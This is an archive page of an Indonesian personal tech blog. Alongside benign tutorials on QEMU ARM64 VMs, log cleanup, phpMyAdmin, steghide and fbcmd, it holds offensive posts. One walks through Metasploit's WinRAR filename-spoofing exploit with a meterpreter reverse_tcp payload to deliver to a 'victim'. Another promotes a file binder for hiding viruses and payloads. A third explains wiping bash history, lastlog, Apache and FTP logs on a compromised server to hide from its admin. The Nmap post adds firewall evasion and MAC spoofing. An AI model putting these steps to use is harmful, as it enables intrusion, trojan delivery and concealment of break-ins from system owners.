Tampilkan postingan dengan label Komputer. Tampilkan semua postingan
Tampilkan postingan dengan label Komputer. Tampilkan semua postingan

Kamis, 05 Maret 2026

Deploy ARM64 (aarch64) dengan Qemu & Virt-Manager

 Halo Guys, Ridwan heres! 
Come again with a new notes update!

Belakangan ini, arsitektur ARM64 atau aarch64 makin naik daun, mulai dari perangkat Raspberry Pi, Apple Silicon, sampai instance Public Cloud seperti AWS Graviton, Google, Azure, Oracle Ampere, semuanya mulai menyediakan ARM karena efisiensi dayanya yang luar biasa, tetapi tetap punya performa jempolan.

Kenapa sih mulai banyak yang memakai arsitektur ARM?

  • Hemat Daya: Cocok buat server rumahan yang nyala 24/7 tanpa bikin tagihan listrik bengkak.
  • Performa per watt: Di banyak skenario, prosesor ARM modern jauh lebih efisien dibandingkan dengan x86 tradisional.
  • Ekosistem Sudah mulai Matang: Sekarang hampir semua aplikasi open-source sudah mendukung arsitektur

Karena di masa depan akan banyak pengguna ARM, bagaimana cara kita melakukan troubleshooting atau mereplikasi issue, kalau pelanggan menggunakan instances dengan arsitektur ARM ?
Apakah kita perlu menyiapkan Perangkat Devices ARM atau berlangganan Cloud Services juga? Jawabannya tentu tidak.

Laptop harian kita yang biasanya menggunakan arsitektur x86_64 sudah bisa mengemulasikan/virtualisasikan ARM devices. Jadi, kita tidak perlu beli hardware baru atau langganan cloud services hanya untuk testing atau troubleshooting.

Penasaran gimana caranya? 
Yuk, simak catatan kali ini!


1. Install Cross-Architecture QEMU

Langkah pertama, kita butuh tools utama, yaitu QEMU. Kamu bisa langsung install dengan perintah ini:

# Debian / Ubuntu
$ sudo apt update
$ sudo apt install qemu-system-arm qemu-efi qemu-efi-aarch64 qemu-utils virt-manager

# RHEL / Fedora
$ sudo dnf group install --with-optional virtualization
$ sudo dnf install qemu-system-aarch64 qemu-utils virt-manager

Note: Paket qemu-system-arm ini adalah paket yang memungkinkan laptop kita menjalankan instruksi CPU ARM64 di atas prosesor Intel/AMD kalian.


2. Download ARM64 Cloud Image

Di sini kita tidak perlu menginstal secara manual menggunakan ISO file yang makan waktu lama. 
Cukup pakai Cloud Image saja yang sudah jadi (format .img atau .qcow2).


3. Create Virtual Machine ARM64

Oke, setelah file cloud images sudah di-download, Kita bisa langsung create VM-nya, tidak ada perbedaan yang jauh dalam membuat VM untuk ARM atau x64. Perhatikan perbedaannya !

Disini saya menggunakan Debian 13 dengan path /home/ridwan/Documents/Qcow2/debian-13-nocloud-arm64.qcow2

  • Menggunakan Qemu ( CLI ):
$ qemu-system-aarch64 \
  -machine virt \
  -cpu cortex-a57 \
  -smp 2 \
  -m 2G \
  -bios /usr/share/AAVMF/AAVMF_CODE.fd \
  -drive if=none,file=/home/ridwan/Documents/Qcow2/debian-13-nocloud-arm64.qcow2,id=hd0 \
  -device virtio-blk-device,drive=hd0 \
  -netdev user,id=net0 \
  -device virtio-net-device,netdev=net0 \
  -nographic

Note: untuk Spec CPU & RAM kalian dapat sesuaikan dengan kebutuhan, untuk path bios location pastikan sudah sesuai !




  • Menggunakan Virt-Manager (GUI)

Pada "Architecture options" pastikan kalian memilih :

  • Architecture = aarch64
  • Machine Type = Virt 

Kemudian pilih cloud images / qcow2 disk dari OS ARM kalian,

untuk Spec CPU ,RAM , Disk kalian dapat sesuaikan dengan kebutuhan

Next / Forward sampai step terakhir, dan tampil seperti berikut :

Note: Jangan kwatir ini normal, Pada banyak image Linux ARM64 (terutama versi server atau cloud image), output booting diarahkan ke Serial Console (ttyAMA0) secara default, bukan ke display grafis. ARM tidak memiliki standar VGA secara otomatis.


Solusinya:
Pilih menu "View" > Console > Pilih Serial 1


**Bonus: Create Ubuntu ARM64 Instances on Public Cloud

  • AWS Graviton (EC2)
# Launch a Graviton instance with Ubuntu 24.04
aws ec2 run-instances \
    --image-id $(aws ec2 describe-images \
        --filters "Name=name,Values=ubuntu/images/hvm-ssd-gp3/ubuntu-noble-24.04-arm64-server-*" \
                  "Name=state,Values=available" \
        --query 'sort_by(Images, &CreationDate)[-1].ImageId' \
        --output text \
        --region us-east-1) \
    --instance-type t4g.micro \
    --key-name your-key-pair \
    --region us-east-1
  • Google Cloud
# Via Google Cloud Shell
gcloud compute instances create [INSTANCE_NAME] \
    --project=[PROJECT_ID] \
    --zone=us-central1-a \
    --machine-type=t2a-standard-1 \
    --image-family=ubuntu-2204-lts-arm64 \
    --image-project=ubuntu-os-cloud \
    --boot-disk-size=20GB \
    --boot-disk-type=pd-balanced
  • Oracle Cloud 
# Via OCI CLI
oci compute instance launch \
    --compartment-id <compartment-id> \
    --availability-domain <ad-name> \
    --shape VM.Standard.A1.Flex \
    --shape-config '{"ocpus": 4, "memoryInGBs": 24}' \
    --image-id <ubuntu-24.04-arm64-image-id> \
    --subnet-id <subnet-id>
  • Hetzner Ampere
# Create an Arm64 server on Hetzner
hcloud server create \
    --name arm64-server \
    --type cax11 \    # Ampere Altra-based server type
    --image ubuntu-24.04 \
    --ssh-key your-key


Sekian tutorial singkat kali ini, Thank you sudah membaca tulisan ini.. 

Semoga bermanfaat !
Rdw
Share:

Selasa, 07 Mei 2024

Log Rotation & Management in Linux like a Pro

 Halo Guys, Sebagai tukang rawat server A.K.A System Administrator pasti sering banget melakukan perawatan / manage log file dari suatu services. Dan services tersebut selalu aktif & melakukan proses setiap hari nya tampa boleh ada stop nya.. 

Oleh karena itu pasti ada output log dari setiap proses yang dilakukan oleh services tersebut, output nya dalam sehari bisa banyak banget dan kadang bisa membuat storage menjadi penuh jika didiamkan dalam waktu lama.

Jika tempat penyimpanan pada log penuh, services bisa saja menjadi stop running, oleh karena itu kita perlu mangatur file-file log tersebut. dan memilih file mana yg perlu dihapus, yang mana yang perlu di pertahankan.

Nah, biasanya yang saya lakukan sebeleum melakukan hapus log, saya melakukan listing log file nya, agar tercatat file log apa saja yang akan dihapus.
dengan menggunakan command berikut :

Dengan command ini kita akan mencari file ".log", yang dibuat pada 30 hari yang lalu di directory "/path/to/logs/",
Lalu karena ada tambahan pipeline dengan command awk print, maka setiap output baris dari command find tersebut akan ditambahkan text print "rm -r" .

Tampilan hasil output nya seperti gambar berikut :

kalau kita lihat gambar di atas output nya sudah menyerupai "bash command" , kita bisa membuat file tersebut menjadi seperti bash script dengan menambahkan permission ( +x )
$ chmod +x output_file

lalu jalankan script tersebut, mulai menghapus file log nya.
$ bash ./output_file

Kenapa ribet-ribet harus membuat list file nya dahulu ?
Bukti/Evidence ini hal yang penting.
Biasanya standart prosedur pada production setiap aktivitas harus ada yang namanya "Persetujuan/Approval dan Bukti/Evidence".

Kenapa tidak menggunakan aplikasi logrotate ?
Aplikasi atau command "find" secara default sudah banyak terinstall di beberapa distro Linux. Berbeda dengan command "logrotate" yang harus memerlukan instalasi tambahan.

Seperti nya ini terlihat sederhana banget ya?
Default command find ini, jika ditambahkan dengan Crontab, atau Airflow dengan paramiko ssh. bisa menjadi tools automation yang keren & tidak bisa dibilang sederhana lagi.

Ok, ta rasa cukup sampai sini tulisan nya..
Kalian bisa kembangkan cara ini & semoga bermanfaat.

Share:

Sabtu, 16 Mei 2020

Server Management Basic


Module ini merupakan module pembelajaran tingkat dasar untuk memperkenalkan dunia System Administrator dalam Management Server.





Module ini dibuat untuk bahan pembelajaran bersifat opensource ( GNU License v2.0)
"Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed".

Maju lah indonesiaku...

Keyword :
Belajar Server Gratis
Belajar Windows Server Indonesia
Belajar Manage Windows Server
Belajar Linux Server Indonesia
Belajar Manage Linux Server
Belajar Server Management
Belajar CompTIA Server+ Plus
Belajar CompTIA Server+ Plus Gratis
Belajar CompTIA Server+ Plus Indonesia
Belajar CompTIA Murah



Share:

Minggu, 12 Agustus 2018

Belajar MTCNA (MikroTik Certified Network Associate)

Halo Guys..
Kali ini saya mau share bahan module yang saya pakai untuk training Mikrotik Dasar.
Semoga slide module ini dapat membantu kawan-kawan untuk lebih memahami & menguasai Mikrotik!

Berikut Module nya dapat dilihat melalu Slideshare :





Keyword :
Belajar Mikrotik
Belajar Mikrotik Indonesia
Belajar MTCNA
Belajar MTCNA Indonesia
Belajar MTCNA Gratis
Download MTCNA Indonesia
Download MTCNA Free
Module MTCNA
Pelatihan MTCNA Gratis
Training MTCNA Gratis
Share:

Rabu, 06 Januari 2016

Rakabulle File Binder


Catatan Kali ini saya bahas Rakabulle
Rakabulle adalah tool FileBinder

Tool ini memungkinkan kalian untuk bind multi files / program bersamaan, dan mengesekusi file bersamaan

jadi beberapa files di jadikan dalam 1 program. think about WinRAR,tapi winrar tidak dengen mengeksekusi.

lengkap nya bisa lihat


english :
What is a file binder? In few words a file binder is a tiny tool which allows merging any kind of files in a single application.
When you execute the application, all previous merged files will be extracted to a temporary location then be executed normally.
Winrar for example propose a kind of function called SFX for Self Extraction Package, the only difference is that the binder doesn’t show any dialog. It will extract and execute the files in transparency.


gambar diatas, file / program yang di input atau drop
input bisa berupa files atau program apa aja

coba bayangkan jika banyak virus yang di jadikan kedalam satu program, dan ketika program tersebut di jalankan..
secara bersamaan ratusan virus itu juga ikut dijalankan :)

**kemarin sih percobaan input nya payload metasploit. and Work !!


beberapa fungsi Rakabulle
- File binder, auto file extractor and executor.
- REM (Remote Code Execution), Execute code (Plugins) in target process (Explorer or Internet Explorer)
- Support 32 and 64 Process.
- The application is a 32bit Application (Soon we will compile the 64bit version)
- Support UPX compression for the stub (Without compression stub size is about 38KiB using pure Windows API no extra libraries; with compression stub size is approximately 16KiB) The UPX compression doesn’t change the way the application work only the final size.
- Support Windows startup.
- Doesn’t require administrative privileges.
- Plugins and File list support drag n drop.
- Support plugins with an open source example.
- The stub and the builder are coded using Unicode encoding.
Share:

Rabu, 25 Maret 2015

Nmap

Nmap atau biasa disebut Network Mapper,
adalah sebuah aplikasi atau tool yang berfungsi untuk melakukan Port Scanning, Aplikasi ini digunakan untuk meng-audit jaringan.
dengan menggunakan tool ini, kita dapat melihat host yang aktif, port yang terbuka, sistem Operasi yang digunanan, dan feature-feature scanning lainnya.
Pada awalnya Nmap hanya bisa berjalan di sistem operasi Linux, Namun dalam perkembangannya sekarang ini, hampir semua sistem operasi bisa menggunakan nya



Tujuan dari postingan ini adalah untuk memperkenalkan penggunaan Command Line Nmap
untuk melakukan scaning dan bagaimana menggunakan Nmap untuk tujuan Ofensif dan Defensif.



penggunaan Nmap sesuai dengan apa yag kita butuhkan. Bila kita menggunakan Nmap untuk melihat port yang terbuka, maka perintahnya akan berbeda dengan perintah bila kita ingin menggunakan Nmap untuk melihat host yang aktif. Bentuk dasar dari perintah Nmap adalah :

Usage : "nmap  <options>  <target>"

Untuk options lainnya, silakan gunakan perintah :

"nmap --help"



Beberapa Contoh command Nmap
1. Scanning sebuat host atau alamat IP (IPv4)
## Scanning Alamat IP tunggal
$ nmap 192.168.1.1

## Nmap scanning nama host ##
nmap server1.domain.com


2. Scan Alamat IP atau beberapa Subnet (IPv4)
nmap [IP] space [IP] space [IP]
Nmap 192.168.1.1 192.168.1.2 192.168.1.3

 ## Bekerja dengan subnet yang sama yaitu 192.168.1.0/24
nmap 192.168.1.1,2,3

anda dapat memindai berbagai alamat IP juga:
nmap 192.168.1.1-20

Anda dapat memindai berbagai alamat IP menggunakan wilcard
nmap 192.168.1.*

Akhirnya, anda memindai seluruh subnet :
nmap 192.168.1.0/24

3. Baca daftar host / jaringan dari file (IPv4)
Pilihan -iL memungkinkan anda untuk membaca daftar sistem target menggunakan file teks.
Hal ini berguna untuk memindai sejumlah besar host / jaringan. Membuat file teks sebagai berikut:
$ cat > /tmp/test.txt

output sampel :
server.domain.com
192.168.1.0/24
192.168.1.1/24
10.1.2.3
localhost

Perintahnya adalah :
nmap -iL /tmp/test.txt

4. Scaning dengan Pengecualian ( Jaringan IPv4)
Ketika memindai sejumlah besar host / jaringan, Anda dapat mengecualikan host dari scan:
$ nmap 192.168.1.0/24 --exlude 192.168.1.15

atau mengecualikan daftar dari file:
nmap -iL /tmp/scanlist.txt --excludefile /tmp/exclude.txt

5. Operationg System Detection
nmap -A [ IP address / host ]
nmap -v -A [ IP address / host ]

6. Cari tahu apakah host / network dilindungi Firewall
nmap -sA [ IP address / host ]

7. Scan host dilindungi oleh Firewall
nmap -PN [ IP address / host ]

8. Scanning IPv6 host / IP address
pilihan memungkinkan IPv6 scanning, Perintahnya adalah:

nmap -6 server.domain.com

9. Scan jaringan, server, perangkat dan proses berjalan.
nmap -sP 192.168.1.0/24

10. Fast Mode
nmap -F [ IP address / host ]

11. Tampilkan keadan port dalam keadaan tertentu
nmap --reason [ IP address / host ]

12. Menampilkan Port Terbuka
nmap --open [ IP address / host ]

13. Menampilkan Packets yang dikirim dan diterima
nmap --packet-trace [ IP address / host ]

14. Menampilkan  host interface and routes
nmap --iflist

15. Scan Port tertentu
  # Scan port 80
nmap -p 80 [ IP address / host ]

 # Scan TCP Port
nmap -p T:80 [ IP address / host ]
                T = berarti TCP Port

 # Scan UDP Port
nmap -p U:53 [ IP address / host ]
                U = Berarti UDP Port
 # Scan ,multiple port
nmap -p 80, 443 [ IP address / host ]

 # scan port range
nmap -p 80-200 [ IP address / host ]
 # scan Combine all options
nmap -p U:53,137, T:21-25,80,139,8080 [ IP address / host ]
nmap -v -sU -sT -p U:53,111,137, T:21-25,80,137,8080 [ IP address / host ]

 # scan all ports with wildcard
nmap -p "*" [ IP address / host ]

 # scan top parts i.e scan $number most common ports
nmap --top-ports 5 [ IP address / host ]
nmap --top-ports 10 [ IP address / host ]

16. The fastest way to scan all your device / computer for open ports ever
nmap -T5 [ IP address / host ]

17. How do I detect remote operationg system
nmap -O [ IP address / host ]
nmap -O --osscan-gues [ IP address / host ]
nmap -v -o --osscan-gues [ IP address / host ]

18. How do I detect remote service / daemon version
nmap -sV [ IP address / host ]

19. Scan a host TCP ACK (PA) and TCP syn (ps) Ping
nmap -PS [ IP address / host ]
nmap -PS 80,21,443, [ IP address / host ]
nmap -PA [ IP address / host ]
nmap -PA 80,21,200,-512 [ IP address / host ]

20. Scan a host using IP protocol ping
nmap -PO [ IP address / host ]

21. Scan a host using UDP ping
TScan ini melewati firewall dan filter yang hanya memeriksa TCP:
nmap -PU [ IP address / host ]

22. Scan paling sering digunakan Port TCP, menggunakan TCP SYN scan
## Stealthy scan
nmap -sS [ IP address / host ]

## Find out the most commonly used TCP port using TCP connect scan
nmap -sT [ IP address / host ]

# Scan TCP port menggunakan TCP ACK Scan
nmap -sA [ IP address / host ]

# Scan TCP port menggunakan TCP Window Scan
nmap -sW [ IP address / host ]

# Scan TCP port menggunakan TCP maimon Scan
nmap -sM [ IP address / host ]

23. UDP Scanning
nmap -sU [ IP address / host ]

24. Scan IP Protocol
nmap -sO [ IP address / host ]

25. Scan celah-celah firewall
## TCP Null scan, Untuk menipu firewall untuk menghasilkan respon
# tidak Mengeset bit ( header flag TCP adalah 0 )
nmap -sN [ IP address / host ]

# TCP Fin Scan untuk memeriksa firewall
nmap -sF [ IP address / host ]

# TCP Xmas scan untuk memeriksa firewall
nmap -sX [ IP address / host ]

26. Scan firewall untuk paket fragmen
Opsi " -f " untuk menggunakan paket IP terfragmentasi kecil. ( PING scan )
idea nya untuk memisahkan TCP header. membuat paket sulit untuk di filter, dan untuk mendekteksi apa yang anda lakukan
nmap -f [ IP address / host ]


28. Scanning dengan MAC Address spoofing
# Spoof your MAC Address
nmap --spoof-mac [MAC Addreas Here] [ Alamat IP Target ]

# mengunakan MAC Address acak
nmap --spoof-mac 0 [ Alamat IP Target ]

options MAC Address Spoofing ini juga bisa di gunakan dengan options lain
nmap -v -sT -PN --spoof-mac [MAC Addreas Here] [ Alamat IP Target ]


Share:

Sabtu, 27 September 2014

Install Linux Debian di Android ( ARM )

Lama banget,aku udah jarang posting ^ ^

hari ini aku mau share, cara install LinuxARM di hp Android..
Kalo biasa nya kita Install android di Linux. skarang kita beda ^ ^

Mungkin yg pernah main Raspberry Pi, tau ya apa itu ARM Processor Architecture

Selain di MiniPC , Nano-ITX , Pico-ITX.
di Handphone Jaman skarang juga sudah bnyak yang mengunakan ARM Processor

kita akan menginstall LinuxARM ini
hanya dengan script installer 3.7mb


Hal yang perlu di perhatikan
- Rooted Acces
- Kernel supports mounting loop disks
- Kernel supports the ext2, ext3, or ext4 file systems
- CPU architecture  ARM (little endian) or i386 (ia-32 bit)
- 128 Mb of RAM atau lebih
- 512 Mb of free space on SD card
- Internet connection ( Kalo bisa yg cepet :p )
- Terminal app installed

WARNING: This stuff is checked on different hardware.
The kit should run with stock factory firmware, but customized ROMs should work also. Nevertheless: root access always includes the chance to do something very fatal to your device. Always watch, read and dig the error messages (if any) and re-think twice before doing something nasty.

Ok, Lets go..
Pertama kita download dulu script installer nya ( 3.71Mb )
Download
Pasti bingung, kok file nya jpeg ? Jangan Kaget :p

lanjut dengen meng'execute file tadi


Setelah proses Extracting selsai, akan ada output macam ini


Disana ada pilihankan ? ane pilih 0l ( 0+L )
arti nya install loop file nya 512mb, dan OS nya Ubuntu Lucid
saat prosses pembuatan file loop. itu lama banget
sebenernya tergantung dari kecepatan Sdcard yg kalian pakai


Ok, Next, Creating filesystem, disarankan berada di daerah yg terjangkau WiFi ^ ^

Setelah hal diatas selsai, akan ada output macam ini..

Sampai sini,hampir selsai
*Perhatikan Tulisan yg dipaling bawah, anda diminta untuk melakukan mounting ke filesystem yg tadi anda buat untuk mengakses nya
ketik "deb" di terminal, dan kemudian "apt-get update"
kalau bisa sekalian di upgrade "apt-get upgrade"


Sampai Step ini..bisa dibilang selsai.

untuk keluar dari session linux itu, ketik aja "exit"
kemudian kita umount filesystem nya dengan "deb u"
jika ingin mengkases nya kembali, enter aja "deb"


cara install linux di android,dengan cara ini..asli stabil
ini bukti nya 


Untuk Tutorial Lengkap nya versi Video
Download disini

Ok, semoga berhasil ya install nya ;)
mohon komentar nya dibawah,untuk Testimonial



Share:

Rabu, 04 Juni 2014

WinRAR Filename Spoofing with Metasploit


Belom lama ini dunia lagi ramai dengan "Winrar File Spoofing"
sampai-sampai metasploit membual module exploit nya..

http://www.exploit-db.com/exploits/32752/

Saya pun tertarik untuk mencoba nya ^ ^
Menurut gw ini cukup bagus ya,buat memanipulasi trap ( jebakan ) ke victim
bisa lolos dari Anti Virus ( entahlah, gak banyak saya test ke AV lain )

Requiment :
Metasploit v4.9.2  atau lebih
more info about metasploit v4.9.2 at https://community.rapid7.com/docs/DOC-2736


ok..mari kita coba
Open your metasploit console


msf > use exploit/windows/fileformat/winrar_name_spoofing
msf > set filename [ Name_File ]
msf > set spoof [ File_Trap ]

msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost [ your IP ]
msf > set lport

Kita buat file nya dengan perintah "exploit"
file berada di directory /root/.msf4/local/



ok,next kita hanya tinggal kasih ke victim :)

Jalankan exploit multi handler

msf > use exploit/multi/handler

untuk melisten/ menerima koneksi dari target via exploit yg tadi dibuat



and..ketik si victim membuka file tersebut,
**damm ,you got meterpreter session

Share:

Senin, 02 Juni 2014

Fixed Failed to Connect to the Database Metasploit

Mungkin dari beberapa orang yg baru belajar Metasploit, pernah ngalamain error database metasploit seperti ini
Failed to connect to the database: could not connect to server: connection refused


Udah Jelas banget dari Pesan nya, Database nya gak connected :)

Ok, Bgini cara Fix nya
1. Pastikan service postgresql, kalian berjalan
2. cek file config database metasploit nya ( /opt/metasploit-4.4.0/config/database.yml )


Jalankan Service Postgresql nya.
$ service postgresql start

Masih ada error ??
bisa jadi itu karna masalah config dengan dengan database msf kalian,
dan ini cara untuk setup new database msf dengan postgresql

Root@Ganteng:# su - postgres
postgres@localhost~$ createuser [Nama User] -P
postgres@localhost~$ [Enter password]
postgres@localhost~$ Validate password
postgres@localhost~$ Shall the new role be a superuser? n
postgres@localhost~$ Shall the new role be allowed to create databases? n
postgres@localhost~$ Shall the new role be allowed to create new roles? n
postgres@localhost~$ createdb --owner=[Nama User] [Name_Database]
postgres@localhost~$ exit

setelah membuat user di posgresql
next kita membuat file configure database Metasploiut nya.
kalian bisa liat contoh file nya di
"/usr/share/metasploit-framework/config/database.yml.example"

edit aja langsung itu file example nya..


Input data-data nya sesuai yg tadi dibuat di postgresql
Kemudia save

dan rename dari "database.yml.example" to "database.yml"



Ok,Next... Buka msfconsole



Jika masih belum connect,coba dengan meng'connectkan langsung di Metasploit nya
msf > db_connect NamaUser:Passwd@127.0.0.1:5432/name_database



Done..
Share:

Kamis, 31 Oktober 2013

Remove Linux Log


Artikel kali ini membahas tentang log

klo di postingan kemaren di artikel "Opsec"
ane pernah bilang
"Gak ada logs,gak ada Bukti."

Misal kamu udah dapet akses root server orang,asyiiik ...
tapi.. eh nanti dulu, gimana kalo adminnya tau??

bagaimana cara agar si admin tidak mengira bahwa servernya pernah dimasuki dan diutak-atik seseorang lewat remote shell ssh. Sehingga siadmin tidak merubah-rubah password untuk kita gunakan pada penyusupan berikutnya.

sebenernya sebuah log itu penting..
kita juga sebagai user,harus sering-sering menghapus log
karna log juga termaksud Privacy anda :D


 Menghapus Comment history pada Terminal
Sebelum anda menghapus nya,ada baik nya anda lihat dlu..
dengan mengunakan comment
$ history
dan untuk menghapus nya
$ rm -rf ~/.bash_history


  Menghapus Last login
untuk melihat logs
$ lastlog
$ cat /var/log/lastlog
dan untuk menghapus nya
$ echo > /var/log/lastlog


  apache2 log
untuk membaca logho
$ cat /var/log/apache2/access.log
untuk menghapus nya
$ echo > /var/log/apache2/access.log



  FTP Server last login Log
view log
$ cat /var/log/vsftpd.log
menghapus nya
$ echo > /var/log/vsftpd.log



5. terusin sendiri @.@


oke segitu aja dlu dari ane :D
akhir-akhir ini ane,bakal jarang posting
lagi banyak kerjaan pemirsa
Share:

Jumat, 09 Agustus 2013

Steganografi Tutorial


hola..
kali ini ane mau share Tentang Steganografi

tapi sebelum nya saya mau ngucapin
Minal 'Aidin wal-Faizin,
mohon maaf kalo saya ada salah" kata selama ini :D


oke,.. kembali ke laptop
untuk yang belum tahu,.. apa itu Steganografi ?

Steganografi
adalah ilmu menulis pesan tersembunyi atau menyembunyikan pesan dengan suatu cara. sehingga selain si pengirim dan si penerima, tidak ada seorangpun yang mengetahui atau menyadari bahwa ada suatu pesan rahasia.

biasa nya teknik ini digunakan untuk mengirim surat bersifat rahasia
para heker,agent,military mungkin mengunakan teknik ini untuk mengirim surat yang bersifat rahasia

Steganografi pertama dikenal oleh bangsa Yunani.
Herodatus, penguasa Yunani, mengirim pesan rahasia dengan menggunakan kepala budak atau prajurit sebagai media. Dalam hal ini, rambut budak dibotaki, lalu pesan rahasia ditulis pada kulit kepala budak. Ketika rambut budak tumbuh, budak tersebut diutus untuk membawa pesan rahasia di balik rambutnya.

segitu aja cerita Steganografi yang pernah ane baca :D


oke,.. let's kita beraksi
install aplikasi ini

$ apt-get install steghide

next.. kita ambil sebuah file dan pesan
masukan file dan pesan tersebut kedalam satu folder


oke sekarang kita coba memasukan pesan.txt ke dalam Clound.jpg
$ steghide embed -cf Clound.jpg -ef pesan.txt

$ Enter passphrase:
untuk menjaga kerahasian,pesan juga di proteksi password
jadi untuk meng extract pesan tersebut di butuhkan password

sekarang kita udah selasai memasukan pesan tersebut kedalam file
bisa di lihat di screenshot di bawah ini



oh iya..pasti kalian juga bertanya
bagaimana cara membaca atau extract pesan tersebut ?

cara meng'extract nya cukup mudah,bisa mengunakan syntax dibawah ini

$ steghide extract -sf Clound.jpg

bisa dilihat di foto di bawah..
sebelum nya tidak ada file pesan.txt
tetapi setelah di extract keluar lah file pesan.txt



gimana mudah bukan ?
oke sekian dari saya Clound

Share:

Selasa, 06 Agustus 2013

Install mysql Server and PhpMyAdmin di CentOs



untuk yang gak tau,apa itu Mysql..PhpMyadmin

SQL-Server dimana tempat kita menaruh atau menyimpan Database

Phpmyadmin adalah aplikasi yang dijalankan melalui web browser,digunakan untuk memanajemen Database..
anda dapat membuat , memodifikasi, insert data, delete data ke dalam database anda.

ada juga aplikasi Management Database seperti phpmyadmin
nama nya Mysql,tapi mysql ini versi "Comment Line"

biar lebih mudah mangka nya ane pakai PhpMyAdmin :D

** Sorry ya,kalao ada yang salah


Sebelum ming'Install..
pasti kan system ada sudah terinstall
-PHP
-Apache Server
untuk centos,apache udah terinstal seperti nya :D

Sekarang kita Install Sql Server nya

$ yum install mysql-server mysql php-mysql

kalo sudah terinstall..
next,kita setting sql server nya

$ /usr/bin/mysql_install_db --user=mysql
pasti kan anda mengunakan acces Root


nah,sekarang kita setting untuk database nya

$ /usr/bin/mysqladmin -u root password 'paswd ente'


nah Sql server sudah berjalan dan terkonfigurasi dengan baik.


oke,next kita install PhpMyadmin nya

add repository phpmyadmin

$ rpm -ivh http://ftp.jaist.ac.jp/pub/Linux/Fedora/epel/6/i386/epel-release-6-8.noarch.rpm
$ yum update

$ yum install phpMyAdmin


PhpMyadmin pun siap di jalankan

**pastikan Apache dan Sql berjalan

$ service httpd start
$ service mysqld start

acces melalu web browser ente
localhost/phpmyadmin
dan masukan dengan user sql yang tadi kalian bikin :D



gimana mudah kan ?
kalau ada yg ingin bertanya silakan

oke,sekian dari ane Clound

Share:

Minggu, 04 Agustus 2013

Pengertian Dasar IDS ( Intrusion Detection System )




Kali kita ane tidak share tutorial tapi materi
Pengertian Dasar IDS ( Intrusion Detection System )

oke langsung aja, :D

IDS atau Intrusion Detection System
adalah sebuah aplikasi perangkat lunak atau perangkat keras yang dapat mendeteksi aktivitas yang mencurigakan dalam sebuah sistem atau jaringan.
IDS dapat melakukan inspeksi terhadap lalu lintas inbound dan outbound dalam sebuah sistem atau jaringan, melakukan analisis dan mencari bukti dari percobaan penyusupan.

Jadi, setiap packet yang melalui jaringan akan dicek terlebih dahulu oleh IDS apakah packet tersebut termasuk kategori ancaman atau tidak.
Jika ternyata ancaman, maka IDS akan membangkitkan alert untuk memberitahu administrator bahwa terdapat ancaman terhadap jaringan. Jika tidak, IDS menganggap sebagai packet normal/bukan ancaman.


- Ada 2 jenis IDS, yaitu :
1. Network-based Intrusion Detection System (NIDS)
Semua lalu lintas yang mengalir ke sebuah jaringan akan dianalisis untuk mencari apakah ada percobaan serangan atau penyusupan ke dalam sistem jaringan. NIDS umumnya terletak di dalam segmen jaringan penting di mana server berada atau terdapat pada "pintu masuk" jaringan. Kelemahan NIDS adalah bahwa NIDS agak rumit diimplementasikan dalam sebuah jaringan yang menggunakan switch Ethernet, meskipun beberapa vendor switch Ethernet sekarang telah menerapkan fungsi IDS di dalam switch buatannya untuk memonitor port atau koneksi.

2.Host-based Intrusion Detection System (HIDS)
Aktivitas sebuah host jaringan individual akan dipantau apakah terjadi sebuah percobaan serangan atau penyusupan ke dalamnya atau tidak. HIDS seringnya diletakkan pada server-server kritis di jaringan, seperti halnya firewall, web server, atau server yang terkoneksi ke Internet.

HIDS adalah IDS yang diletakkan pada suatu host, misalnya diinstall pada server atau client.
Sedangkan NIDS adalah IDS yang diletakkan pada pintu masuknya lalu lintas jaringan, misalnya pada switch, router, firewall.


IDS mempunyai dua metode dalam melakukan pendeteksian terhadap intrusi, yaitu Signature Based dan Anomaly Based.

A.IDS berdasarkan signature mendeteksi adanya intrusi berdasarkan database yang sudah ada.Dengan kata lain,  intrusi tersebut sudah dikenali sebelumnya. Metode ini mirip seperti antivirus yang kita gunakan di komputer.
Kekurangan dari metode ini ialah jika terdapat pola serangan baru, maka intrusi tidak akan dikenali oleh IDS.

B.anomaly based mendeteksi intrusi berdasarkan kondisi traffic yang tidak biasanya.
Contoh: apabila keadaan trafik normal jaringan 1mbps, tiba-tiba pemakaian bandwidth naik menjadi 4mbps, maka IDS berdasarkan anomaly based ini akan menganggap adanya intrusi terhadap jaringan.
Kelemahan dari metode ini adalah banyaknya false positive, dimana  terdapat kesalahan terhadap pendeteksian  karena kondisi normal bisa saja dianggap sebagai intrusi.

IDS ini bersifat pasif, artinya hanya mendeteksi intrusi dan membangkitkan alert saja tanpa disertai tindakan preventif. Untuk tindakan selanjutnya diserahkan kepada administrator apakah koneksi yang masuk tersebut harus diblokir atau tidak.
Hal ini tentunya saja merepotkan administrator karena harus mengecek alert satu persatu. Belum lagi jika jaringan skala besar, bisa jadi terdapat ribuan alert yang harus dipantau. Untuk mengantisipasi hal ini, dikembangkanlah IPS atau Intrusion Prevention System.

oke itu aja yg ane ngerti tentang IDS,
maaf kalo ada salah ya :D
next nanti ane bahas tentang IPS

sampai jumpat di postingan selanjut nya ya :D

Source : Wikipedia
Share:

Selasa, 30 Juli 2013

Facebook on Console with fbcmd


kali ini ane mau share cara facebook'an di terminal/console
mangkin keren aja dah facebook'an dari Console
serba dari console,semua dari console pke aplikasi CLI,biar kaya heker


oke,langsung aja.. nama aplikasi nya fbcmd
apikasi ini di buat dengan bahasa PHP dan di jalankan melalui console/terminal

pertama Install PHP5 terlibih dahulu
$ sudo apt-get install php5-cli php5-curl

kalo udah di install PHP5 nya,sekarang download nih fbcmd nya

wget  https://raw.github.com/dtompkins/fbcmd/master/fbcmd_update.php

next,tinggal kita install aja ini..

$ php fbcmd_update.php
$ php fbcmd_update.php install

nah..itu aplikasi FBCMD nya udah terinstall
sekarang kita hanya tinggal login account FB kita ke itu Aplikasi

cekidot..

$ fbcmd go access

nanti dia akan membuka tab pada browser kalian,untuk meminta persetujuan Aplikasi pada Account FB ente
**santai aja aman kok.


nah itu kan keluar itu Kode auth nya,..
masukan ke aplikasi nya untuk login ke account ente

$ fbcmd auth [kode auth]


kalo sudah semua.. tinggal kita coba nih..
ketik aja di Console :
$ fbcmd


Apa aja sih yg bisa di lakuin di FBCMD

Baca Status yang ada di Beranda/Home
$ fbcmd stream



Baca Inbox
$ fbcmd inbox



Update status
$ fbcmd status "Clound tampan"


Lihat daftar teman Online
$ fbcmd fonline
Cek pemberitahuan
$ fbcmd notify


dan masih bnyak lagi lah
